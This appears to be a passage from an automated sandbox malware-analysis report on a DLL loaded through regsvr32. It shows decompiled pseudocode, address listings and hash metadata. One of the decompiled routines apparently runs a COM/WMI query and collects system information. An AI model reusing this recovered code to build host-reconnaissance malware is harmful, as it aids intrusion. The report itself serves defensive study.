									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0x8b3c7e8b
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0x89fffffe
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0x8b3c7e89
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0x238830a
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0xfffffe8b
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0x8b3c7e89
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}
























































                  0x10016eb3
                  0x10016eba
                  0x10016ebe
                  0x10016ec0
                  0x10016ec2
                  0x10016ec8
                  0x100173b5
                  0x100173bb
                  0x10016ece
                  0x10016eda
                  0x10016ee7
                  0x10016eea
                  0x10016ef1
                  0x10016ef4
                  0x10016ef7
                  0x10016efa
                  0x10016efb
                  0x10016efe
                  0x10016f04
                  0x10016f07
                  0x10016f0c
                  0x10016f1c
                  0x10016f1e
                  0x10016fd4
                  0x10017163
                  0x10017163
                  0x1001716c
                  0x1001727f
                  0x1001727f
                  0x10017286
                  0x10017286
                  0x1001728f
                  0x1001729c
                  0x100172a5
                  0x100172a8
                  0x100172ad
                  0x100172f5
                  0x100172af
                  0x100172af
                  0x100172b2
                  0x100172b9
                  0x100172bf
                  0x100172c2
                  0x100172c5
                  0x100172c8
                  0x100172cb
                  0x100172ce
                  0x100172d4
                  0x100172e2
                  0x100172e5
                  0x100172e8
                  0x100172f1
                  0x100172f1
                  0x100172f8
                  0x100172fb
                  0x10017301
                  0x10017308
                  0x1001730e
                  0x1001735c
                  0x10017368
                  0x1001736f
                  0x10017310
                  0x10017310
                  0x10017313
                  0x1001731c
                  0x1001731f
                  0x10017322
                  0x10017329
                  0x1001732c
                  0x1001732f
                  0x10017332
                  0x10017335
                  0x1001733b
                  0x10017346
                  0x1001734c
                  0x10017353
                  0x10017353
                  0x00000000
                  0x1001730e
                  0x10017172
                  0x10017172
                  0x10017179
                  0x10017179
                  0x10017182
                  0x1001718f
                  0x10017198
                  0x1001719b
                  0x100171a0
                  0x100171a2
                  0x100171a5
                  0x100171ac
                  0x100171b2
                  0x100171b5
                  0x100171b8
                  0x100171bb
                  0x100171be
                  0x100171c1
                  0x100171c7
                  0x100171d5
                  0x100171db
                  0x100171de
                  0x100171e1
                  0x100171e1
                  0x100171e4
                  0x100171e6
                  0x100171e9
                  0x100171ef
                  0x100171f6
                  0x100171fc
                  0x10017255
                  0x10017255
                  0x10017258
                  0x10017258
                  0x1001725e
                  0x10017266
                  0x10017273
                  0x100171fe
                  0x100171fe
                  0x10017209
                  0x1001720c
                  0x1001720f
                  0x10017212
                  0x10017219
                  0x1001721c
                  0x1001721f
                  0x10017222
                  0x10017225
                  0x1001722b
                  0x10017237
                  0x1001723c
                  0x10017249
                  0x10017249
                  0x00000000
                  0x100171fc
                  0x10016fda
                  0x10016fdf
                  0x10016fe5
                  0x10016fe5
                  0x10016fed
                  0x10016fed
                  0x10016ff5
                  0x10016ff5
                  0x10016ffd
                  0x1001700a
                  0x10017013
                  0x10017018
                  0x1001705d
                  0x1001705f
                  0x1001701a
                  0x1001701a
                  0x1001701d
                  0x10017020
                  0x10017027
                  0x1001702a
                  0x1001702d
                  0x10017030
                  0x10017033
                  0x10017039
                  0x10017047
                  0x1001704d
                  0x10017056
                  0x10017059
                  0x10017059
                  0x10017062
                  0x10017065
                  0x1001706b
                  0x1001706b
                  0x10017072
                  0x10017072
                  0x10017079
                  0x10017079
                  0x10017081
                  0x10017081
                  0x10017088
                  0x10017095
                  0x1001709e
                  0x100170a1
                  0x100170a6
                  0x100170a8
                  0x100170ab
                  0x100170b2
                  0x100170b8
                  0x100170bb
                  0x100170be
                  0x100170c1
                  0x100170c4
                  0x100170c7
                  0x100170cd
                  0x100170db
                  0x100170e1
                  0x100170e4
                  0x100170e7
                  0x100170e7
                  0x100170ea
                  0x100170ec
                  0x100170ef
                  0x100170f5
                  0x100170fc
                  0x10017102
                  0x1001715b
                  0x1001715b
                  0x00000000
                  0x10017104
                  0x10017104
                  0x1001710f
                  0x10017112
                  0x10017115
                  0x10017118
                  0x1001711f
                  0x10017122
                  0x10017125
                  0x10017128
                  0x1001712b
                  0x10017131
                  0x1001713d
                  0x10017142
                  0x1001714f
                  0x00000000
                  0x1001714f
                  0x10016f24
                  0x10016f2a
                  0x10016f2d
                  0x10016f30
                  0x10016f30
                  0x10016f33
                  0x10016f33
                  0x10016f39
                  0x10016f39
                  0x10016f41
                  0x10016f46
                  0x10016f53
                  0x10016f5c
                  0x10016f5f
                  0x10016f64
                  0x10016fac
                  0x10016f66
                  0x10016f66
                  0x10016f69
                  0x10016f70
                  0x10016f76
                  0x10016f79
                  0x10016f7c
                  0x10016f7f
                  0x10016f82
                  0x10016f85
                  0x10016f8b
                  0x10016f99
                  0x10016f9c
                  0x10016f9f
                  0x10016fa8
                  0x10016fa8
                  0x10016fb2
                  0x10016fb8
                  0x10016fbb
                  0x10016fc2
                  0x10016fc2
                  0x10017375
                  0x10017375
                  0x10017378
                  0x1001737a
                  0x1001737f
                  0x1001738e
                  0x1001739a
                  0x1001739f
                  0x1001739f
                  0x10017390
                  0x10017390
                  0x10017395
                  0x10017395
                  0x10017395
                  0x10017381
                  0x10017381
                  0x10017386
                  0x10017386
                  0x10017386
                  0x00000000
                  0x1001737f
                  0x10016f1e
                  0x10016f13
                  0x10016f16
                  0x100173a4
                  0x00000000
                  0x100173a4
                  0x00000000
                  0x100173a7
                  0x100173a7
                  0x100173ab
                  0x100173ab
                  0x100173ab
                  0x00000000
                  0x10016ef4

                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                  • Instruction ID: 0c3308942ac57208bd8606007510a2814f56dadb0132f9c471c079d8b51e24d2
                  • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                  • Instruction Fuzzy Hash: EEF16D755092518FC709CF18C4D48FA7BF1FFA9310B1A82F9D8999B3A6D731A980CB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10014FC0, Relevance: .2, Instructions: 190COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
                  • Instruction ID: e10ac18f6a2dc82c047ac3a6231bc634579b0427d93bb8cac9548a9b95137502
                  • Opcode Fuzzy Hash: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
                  • Instruction Fuzzy Hash: 817135356201758FE704CF2ADCD05BA33A1E78E34138AC629FA46CF395C535E626CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10011758, Relevance: .2, Instructions: 169COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
                  • Instruction ID: 8b2308eb0caa98c5fc40748196c6a291e313b8726404b2d010a505a218b38381
                  • Opcode Fuzzy Hash: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
                  • Instruction Fuzzy Hash: 175157B3B041B00BDF588E3D8C642757ED35AC515270EC2BAF9A9CB24AE978C7059760
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10077464, Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.497815135.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10077000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                  • Instruction ID: a747058df7fb53957c711544c71ce12918e7169a6b47a17de73b7eef07d7616c
                  • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                  • Instruction Fuzzy Hash: E31196733401009FD754CE55DC91EA677EAFB992707258065ED48CB316D779EC41C760
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10012346, Relevance: .1, Instructions: 72COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
                  • Instruction ID: 1f3934e2420efc180bb9c0cbc4fac13afaf5f650056083a87c6d8f741bd90931
                  • Opcode Fuzzy Hash: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
                  • Instruction Fuzzy Hash: 6E2192766150128BD35CDF2CD8A2A69F3A5FB48310F45427ED42BCB682CB71E492CB80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1007785D, Relevance: .1, Instructions: 55COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.497815135.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10077000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                  • Instruction ID: 784e0acdb4fcdcc5ceb578c6db7b19a6e3175e33625eb0579154fecf24664306
                  • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                  • Instruction Fuzzy Hash: 390126333842418FD789CF28D888D6DB7E4FBC12A4B16C0BEC58A83615D938E845CA36
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 50%
                  			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E10008604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E1000861A( &_v60, 0xfffffffe);
					E1000D5D7( &_v104);
					return _t320;
				}
				_t165 = E100095E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E100095E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100092E5(_t165);
				_v60 = _t322;
				E100085D5( &_v52);
				E100085D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100095E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E100085D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E1000861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E100091E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E10008698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E1000861A(_t136, 0);
								E1000861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E100091E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100095E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E100095E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E100085D5( &_v92);
											E100085D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E10009640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095E1(_t283, 0x219);
										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E1000861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                  0x1000db45
                  0x1000db4b
                  0x1000db52
                  0x1000db55
                  0x1000db58
                  0x1000db5d
                  0x1000db5f
                  0x1000db64
                  0x1000dfac
                  0x1000dfac
                  0x1000db71
                  0x1000db73
                  0x1000db76
                  0x1000db79
                  0x1000df91
                  0x1000df97
                  0x1000dfa1
                  0x00000000
                  0x1000dfa6
                  0x1000db84
                  0x1000db8b
                  0x1000db92
                  0x1000db95
                  0x1000db9a
                  0x1000db9c
                  0x1000db9f
                  0x1000dba2
                  0x1000dba3
                  0x1000dbac
                  0x1000dbb2
                  0x1000dbb5
                  0x1000dbbe
                  0x1000dbc3
                  0x1000dbc8
                  0x1000dbdf
                  0x1000dbec
                  0x1000dbef
                  0x1000dbf6
                  0x1000dbfb
                  0x1000dc02
                  0x1000dc07
                  0x1000dc0e
                  0x1000dc10
                  0x1000dc1c
                  0x1000dc1f
                  0x1000dc21
                  0x1000df81
                  0x1000df82
                  0x1000df8b
                  0x00000000
                  0x1000df8b
                  0x1000dc27
                  0x1000dc2a
                  0x1000dc2d
                  0x1000dc30
                  0x1000dc32
                  0x1000df4d
                  0x1000df50
                  0x1000df53
                  0x1000df55
                  0x1000df77
                  0x1000df7c
                  0x1000df57
                  0x1000df5a
                  0x1000df65
                  0x1000df6c
                  0x1000df6c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x1000dc38
                  0x1000dc38
                  0x1000dc4a
                  0x1000dc4d
                  0x1000dc4f
                  0x00000000
                  0x00000000
                  0x1000dc57
                  0x1000dc5a
                  0x1000dc5d
                  0x1000dc60
                  0x1000dc63
                  0x1000dc66
                  0x00000000
                  0x00000000
                  0x1000dc6c
                  0x1000dc7a
                  0x1000dc7d
                  0x1000dc7f
                  0x1000dc98
                  0x1000dca7
                  0x1000dcaf
                  0x1000dcaf
                  0x1000dcb2
                  0x1000dcb9
                  0x1000dcbd
                  0x1000dcc3
                  0x1000dcc5
                  0x1000df35
                  0x1000df3b
                  0x1000df41
                  0x1000df44
                  0x1000df44
                  0x00000000
                  0x1000df44
                  0x1000dcd4
                  0x1000dce8
                  0x1000dcec
                  0x1000dcee
                  0x1000dcf3
                  0x1000df02
                  0x1000df08
                  0x1000df13
                  0x1000df1e
                  0x1000df24
                  0x1000df2a
                  0x1000df2d
                  0x00000000
                  0x1000df2d
                  0x1000dcf9
                  0x1000ded0
                  0x1000ded0
                  0x1000ded3
                  0x1000ded6
                  0x00000000
                  0x00000000
                  0x1000dd01
                  0x1000dd09
                  0x1000dd10
                  0x1000dd16
                  0x1000dd18
                  0x00000000
                  0x00000000
                  0x1000dd21
                  0x1000dd36
                  0x1000dd3c
                  0x1000dd45
                  0x1000dd48
                  0x1000dd4b
                  0x1000dd4d
                  0x1000dec3
                  0x1000dec6
                  0x1000decf
                  0x1000decf
                  0x00000000
                  0x1000decf
                  0x1000dd5d
                  0x1000dd60
                  0x1000dd67
                  0x1000dd6d
                  0x1000dd70
                  0x1000dd73
                  0x1000dd76
                  0x1000dd79
                  0x1000ddb5
                  0x1000ddb5
                  0x1000ddb8
                  0x1000de64
                  0x1000de78
                  0x1000de88
                  0x1000de8c
                  0x1000de8e
                  0x1000dea5
                  0x1000dea9
                  0x1000deb2
                  0x1000debd
                  0x00000000
                  0x1000debd
                  0x1000de94
                  0x1000de95
                  0x1000de9a
                  0x1000de9a
                  0x1000de9c
                  0x1000de9d
                  0x1000dea2
                  0x00000000
                  0x1000dea2
                  0x1000ddbe
                  0x1000ddbe
                  0x1000ddc1
                  0x1000de2c
                  0x1000de40
                  0x1000de50
                  0x1000de54
                  0x1000de56
                  0x00000000
                  0x00000000
                  0x1000de5c
                  0x1000de5d
                  0x00000000
                  0x1000de5d
                  0x1000ddc3
                  0x1000ddc3
                  0x1000ddc6
                  0x00000000
                  0x00000000
                  0x1000ddc8
                  0x1000ddcb
                  0x00000000
                  0x00000000
                  0x1000ddcd
                  0x1000ddcd
                  0x1000ddd3
                  0x1000ddef
                  0x1000ddfe
                  0x1000de07
                  0x1000de0c
                  0x1000de0f
                  0x1000de15
                  0x1000de15
                  0x1000de1a
                  0x1000de26
                  0x00000000
                  0x1000de26
                  0x1000ddd8
                  0x00000000
                  0x1000ddd8
                  0x1000dd7b
                  0x1000dda2
                  0x1000dda7
                  0x1000ddac
                  0x1000ddae
                  0x1000ddae
                  0x00000000
                  0x1000ddac
                  0x1000dd7d
                  0x1000dd7d
                  0x1000dd80
                  0x00000000
                  0x00000000
                  0x1000dd86
                  0x1000dd86
                  0x1000dd89
                  0x00000000
                  0x00000000
                  0x1000dd8f
                  0x1000dd8f
                  0x1000dd92
                  0x00000000
                  0x00000000
                  0x1000dd98
                  0x1000dd9b
                  0x00000000
                  0x00000000
                  0x1000dd9d
                  0x00000000
                  0x1000dd9d
                  0x1000dedf
                  0x1000dee5
                  0x1000deeb
                  0x1000deee
                  0x1000def1
                  0x1000def1
                  0x1000def4
                  0x1000def5
                  0x1000def8
                  0x1000defa
                  0x00000000
                  0x00000000
                  0x1000df4a
                  0x1000df4a
                  0x00000000
                  0x1000df4a
                  0x1000dc81
                  0x1000dc87
                  0x00000000
                  0x1000dc87
                  0x1000df47
                  0x00000000
                  0x1000dbca
                  0x1000dbcf
                  0x1000dbd4
                  0x00000000
                  0x1000dbd8

                  APIs
                    • Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
